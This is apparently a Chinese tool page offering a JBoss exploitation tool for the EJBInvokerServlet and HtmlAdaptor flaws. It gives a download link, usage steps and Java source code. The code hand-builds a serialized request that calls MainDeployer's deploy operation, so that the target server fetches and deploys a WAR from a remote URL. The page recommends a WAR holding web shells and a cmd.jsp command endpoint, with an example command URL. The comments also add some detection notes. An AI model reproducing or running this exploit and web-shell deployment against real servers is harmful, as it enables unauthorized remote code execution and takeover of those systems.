Jboss JMX/EJBInvokerServlet、HtmlAdaptor漏洞利用工具
免责声明:本站提供的所有工具及代码仅供交流学习,不得用于商业或黑客行为。下载地址:Jboss漏洞利用工具.jar 链接: 密码: ucdl 功能说明:
安装jdk并配置好环境变量,然后填好参数先点获取即可,成功后会返回"请求成功."。 1、JMX/EJBInvokerServlet: host写IP或域名:127.0.0.1/p2j.cn port必填,如:8080 2、HtmlAdaptor: host写URL地址:http://localhost:8080 port不需填写 3、war包推荐使用:http://javaweb.org/is.war,is.war里面带有几个版本的一句话和一个cmd.jsp (如:http://xxx.com/is/?cmd.jsp?pwd=023&cmd=ls)如果使用自己的war包, cmd功能需要默认配置(/is/cmd.jsp)war包只自带了mysql数据库所需要的jar, 连接oracle等其他数据库需要自己添加jar包
截图-JMX/EJBInvokerServlet:
截图-HtmlAdaptor:
核心源码:
package org.javaweb.jboss;

import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.InetSocketAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.SocketChannel;
import java.util.ArrayList;
import java.util.List;

/**
 * Builds a fixed, pre-serialized Java object stream and posts it to a JBoss
 * {@code /invoker/EJBInvokerServlet/} endpoint over a raw socket.
 *
 * <p>The byte arrays below are fragments of a Java serialization stream
 * (each starts with the {@code 0xaced 0005} stream magic or continues one);
 * the ASCII dumps in the trailing comments show the class names they carry:
 * {@code org.jboss.invocation.MarshalledInvocation}, {@code MarshalledValue},
 * {@code javax.management.ObjectName} with the value
 * {@code jboss.system:service=MainDeployer}, the operation name {@code deploy},
 * a {@code String[]} signature of {@code java.lang.String}, and the
 * {@code InvocationKey}/{@code InvocationType} entries with the
 * {@code JMX_OBJECT_NAME} key. The caller-supplied {@code war} string is
 * spliced between {@link #a2} and {@link #a3}.
 *
 * <p>Defensive note: everything this class emits is observable on the wire.
 * A request to {@code /invoker/EJBInvokerServlet/} whose body is a
 * {@code application/x-java-serialized-object} stream naming
 * {@code MainDeployer}/{@code deploy} is the artifact to detect; restricting
 * or removing the invoker servlets is the mitigation for the underlying
 * exposure (the JBoss invoker servlets deserialize whatever they receive).
 */
public class Test {

	// Fragment 1: stream header + MarshalledInvocation + java.lang.Integer + MarshalledValue header.
	byte[] a1 = new byte[]{
		(byte) 0xac,(byte) 0xed,0x00,0x05,0x73,0x72,0x00,0x29,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73, // ....sr.) org.jbos
		0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d,0x61,0x72, // s.invoca tion.Mar
		0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f, // shalledI nvocatio
		0x6e,(byte) 0xf6,0x06,(byte) 0x95,0x27,0x41,0x3e,(byte) 0xa4,(byte) 0xbe,0x0c,0x00,0x00,0x78,0x70,0x70,0x77, // n...'A>. ....xppw
		0x08,0x78,(byte) 0x94,(byte) 0x98,0x47,(byte) 0xc1,(byte) 0xd0,0x53,(byte) 0x87,0x73,0x72,0x00,0x11,0x6a,0x61,0x76, // .x..G..S .sr..jav
		0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,0x72,0x12,(byte) 0xe2, // a.lang.I nteger..
		(byte) 0xa0,(byte) 0xa4,(byte) 0xf7,(byte) 0x81,(byte) 0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,0x61,0x6c,0x75, // .....8.. .I..valu
		0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4e, // exr..jav a.lang.N
		0x75,0x6d,0x62,0x65,0x72,(byte) 0x86,(byte) 0xac,(byte) 0x95,0x1d,0x0b,(byte) 0x94,(byte) 0xe0,(byte) 0x8b,0x02,0x00,0x00, // umber... ........
		0x78,0x70,0x26,(byte) 0x95,(byte) 0xbe,0x0a,0x73,0x72,0x00,0x24,0x6f,0x72,0x67,0x2e,0x6a,0x62, // xp&...sr .$org.jb
		0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d, // oss.invo cation.M
		0x61,0x72,0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x56,0x61,0x6c,0x75,0x65,(byte) 0xea,(byte) 0xcc, // arshalle dValue..
		(byte) 0xe0,(byte) 0xd1,(byte) 0xf4,0x4a,(byte) 0xd0,(byte) 0x99,0x0c,0x00,0x00,0x78,0x70,0x77 };

	// Fixed five-byte constant written between a1 and a2 (meaning not established by this file).
	byte[] aa = new byte[]{(byte) 0xeb,0x0,0x0,0x0,(byte) 0xe3};

	// Fixed two-byte constant written immediately before the war bytes; it is not derived from the war argument.
	byte[] ab = new byte[]{0x0,0x15};

	// Fragment 2: Object[] header, ObjectName "jboss.system:service=MainDeployer", operation "deploy", start of a String argument.
	byte[] a2 = new byte[]{
		(byte) 0xac,(byte) 0xed,0x00,0x05,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e, // .....ur. .[Ljava.
		0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,(byte) 0x90,(byte) 0xce,0x58,(byte) 0x9f, // lang.Obj ect;..X.
		0x10,0x73,0x29,0x6c,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x04,0x73,0x72,0x00, // .s)l...x p....sr.
		0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d,0x65,0x6e, // .javax.m anagemen
		0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03,(byte) 0xa7,0x1b, // t.Object Name....
		(byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62,0x6f,0x73, // .m.....x pt.!jbos
		0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69,0x63,0x65, // s.system :service
		0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78,0x74,0x00, // =MainDep loyerxt.
		0x06,0x64,0x65,0x70,0x6c,0x6f,0x79,0x75,0x71,0x00,0x7e,0x00,0x00,0x00,0x00,0x00, // .deployu q.~.....
		0x01,0x74 };

	// Fragment 3: String[] signature containing a single "java.lang.String".
	byte[] a3 = new byte[]{
		0x75,0x72,0x00, 0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61, // ur..[ Ljava.la
		0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,(byte) 0xad,(byte) 0xd2,0x56,(byte) 0xe7,(byte) 0xe9,0x1d, // ng.Strin g;..V...
		0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00,0x10,0x6a,0x61, // {G...xp. ...t..ja
		0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67 };

	// Fragment 4: InvocationKey / InvocationType entries, the JMX_OBJECT_NAME key, and the MainDeployer ObjectName again.
	byte[] a4 = new byte[]{
		0x0d,(byte) 0xd3, (byte) 0xbe,(byte) 0xc9,0x78,0x77,0x04,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x22,0x6f,0x72,0x67, // ..xw.... .sr."org
		0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f, // .jboss.i nvocatio
		0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x4b,0x65,0x79,(byte) 0xb8, // n.Invoca tionKey.
		(byte) 0xfb,0x72,(byte) 0x84,(byte) 0xd7,(byte) 0x93,(byte) 0x85,(byte) 0xf9,0x02,0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64, // .r...... ..I..ord
		0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00,0x00,0x05,0x73,0x71,0x00,0x7e,0x00,0x05, // inalxp.. ..sq.~..
		0x77,0x0d,0x00,0x00,0x00,0x05,(byte) 0xac,(byte) 0xed,0x00,0x05,0x70,(byte) 0xfb,0x57,(byte) 0xa7,(byte) 0xaa,0x78, // w....... ..p.W..x
		0x77,0x04,0x00,0x00,0x00,0x03,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x04, // w.....sq .~......
		0x73,0x72,0x00,0x23,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e, // sr.#org. jboss.in
		0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74, // vocation .Invocat
		0x69,0x6f,0x6e,0x54,0x79,0x70,0x65,0x59,(byte) 0xa7,0x3a,0x1c,(byte) 0xa5,0x2b,0x7c,(byte) 0xbf,0x02, // ionTypeY .:..+|..
		0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64,0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00, // ..I..ord inalxp..
		0x00,0x01,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x0a,0x70,0x74,0x00,0x0f, // ..sq.~.. ....pt..
		0x4a,0x4d,0x58,0x5f,0x4f,0x42,0x4a,0x45,0x43,0x54,0x5f,0x4e,0x41,0x4d,0x45,0x73, // JMX_OBJE CT_NAMEs
		0x72,0x00,0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d, // r..javax .managem
		0x65,0x6e,0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03, // ent.Obje ctName..
		(byte) 0xa7,0x1b,(byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62, // ...m.... .xpt.!jb
		0x6f,0x73,0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69, // oss.syst em:servi
		0x63,0x65,0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78, // ce=MainD eployerx
		0x78 };

	/**
	 * Writes {@code requestData} to {@code host:port} over a raw TCP socket and
	 * returns as soon as the peer sends any bytes back.
	 *
	 * <p>The response is read into a 512-byte buffer and discarded; nothing is
	 * parsed or returned. After the single write the channel is switched to
	 * non-blocking mode and polled in a tight loop until {@code read} reports a
	 * positive count (a busy-wait; a peer that never answers keeps this method
	 * spinning). The channel is closed only on the success path.
	 *
	 * @param host        target host name or IP
	 * @param port        target TCP port
	 * @param requestData complete request bytes (HTTP head plus body) to send
	 * @throws Exception any {@link IOException} from connect/write/read is rethrown unchanged
	 */
	public void send(String host,int port,byte[] requestData) throws Exception {
		try {
			SocketChannel socketChannel = SocketChannel.open();
			// 5 s connect timeout; no read timeout is applied anywhere below.
			socketChannel.socket().connect(new InetSocketAddress(host,port),5000);
			socketChannel.configureBlocking(false);
			ByteBuffer byteBuffer = ByteBuffer.allocate(512);
			socketChannel.write(ByteBuffer.wrap(requestData));
			while (true) {
				byteBuffer.clear();
				int readBytes = socketChannel.read(byteBuffer);
				if (readBytes > 0) {
					// Any response at all is treated as "done"; the bytes are never inspected.
					byteBuffer.flip();
					socketChannel.close();
					break;
				}
			}
		} catch (IOException e) {
			// Rethrown as-is; the catch adds nothing.
			throw e;
		}
	}

	/**
	 * Appends every element of {@code b} to {@code ls} (boxing each byte).
	 *
	 * @param ls destination list, mutated in place
	 * @param b  bytes to append
	 */
	protected void addByte(List<Byte> ls,byte[] b){
		for(byte bb:b){
			ls.add(bb);
		}
	}

	/**
	 * Unboxes a {@code Byte[]} into a primitive {@code byte[]}.
	 *
	 * @param b boxed bytes; a {@code null} element would throw a NullPointerException on unboxing
	 * @return the same bytes as a primitive array
	 */
	protected byte[] toByteArray(Byte[] b){
		ByteArrayOutputStream bos = new ByteArrayOutputStream();
		for(byte bs:b){
			bos.write(bs);
		}
		return bos.toByteArray();
	}

	/**
	 * Fetches {@code url} with {@link URL#openStream()} and returns its body as
	 * text, one line per {@code "\r\n"}.
	 *
	 * <p>Decoding uses the platform default charset (no charset is passed to
	 * {@link InputStreamReader}), the reader is never closed, and the body is
	 * accumulated with {@code +=} in a loop.
	 *
	 * @param url URL to fetch
	 * @return the response body with each line terminated by CRLF
	 * @throws Exception any I/O error from opening or reading the stream
	 */
	public String request(String url) throws Exception{
		String str = "",tmp;
		BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
		while((tmp=br.readLine())!=null){
			str+=tmp+"\r\n";
		}
		return str;
	}

	/**
	 * Assembles the serialized body ({@code a1 aa a2 ab war a3 a4}) and a
	 * hand-written HTTP/1.1 {@code POST /invoker/EJBInvokerServlet/} request
	 * around it, then hands the whole thing to {@link #send}.
	 *
	 * <p>Wire artifacts worth knowing for detection: a non-standard
	 * {@code ContentType:} header (no hyphen) advertising
	 * {@code application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation},
	 * a second {@code Content-type: application/x-www-form-urlencoded} header,
	 * {@code User-Agent: Java/1.6.0_21}, and a body beginning with the
	 * serialization magic {@code AC ED 00 05}. {@code Content-Length} is the
	 * length of the serialized body only. {@code war.getBytes()} uses the
	 * platform default charset.
	 *
	 * @param host target host, also placed in the {@code Host} header
	 * @param port target port
	 * @param war  string spliced into the serialized stream as the {@code deploy} argument
	 * @throws Exception propagated from {@link #send}
	 */
	public void testEJBInvokerServlet(String host,int port,String war) throws Exception{
		List<Byte> ls = new ArrayList<Byte>();
		addByte(ls, a1);
		addByte(ls,aa);
		addByte(ls, a2);
		addByte(ls, ab);
		addByte(ls, war.getBytes());
		addByte(ls, a3);
		addByte(ls, a4);
		byte[] b = toByteArray(ls.toArray(new Byte[ls.size()]));
		String req = "POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n"+
			"ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n"+
			"Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n"+
			"User-Agent: Java/1.6.0_21\r\n"+
			"Host: "+host+":"+port+"\r\n"+
			"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n"+
			"Connection: keep-alive\r\n"+
			"Content-type: application/x-www-form-urlencoded\r\n"+
			"Content-Length: "+b.length+"\r\n\r\n";
		// Reuse the list: HTTP head first, then the serialized body.
		ls.clear();
		addByte(ls, req.getBytes());
		addByte(ls, b);
		send(host,port,toByteArray(ls.toArray(new Byte[ls.size()])));
	}
}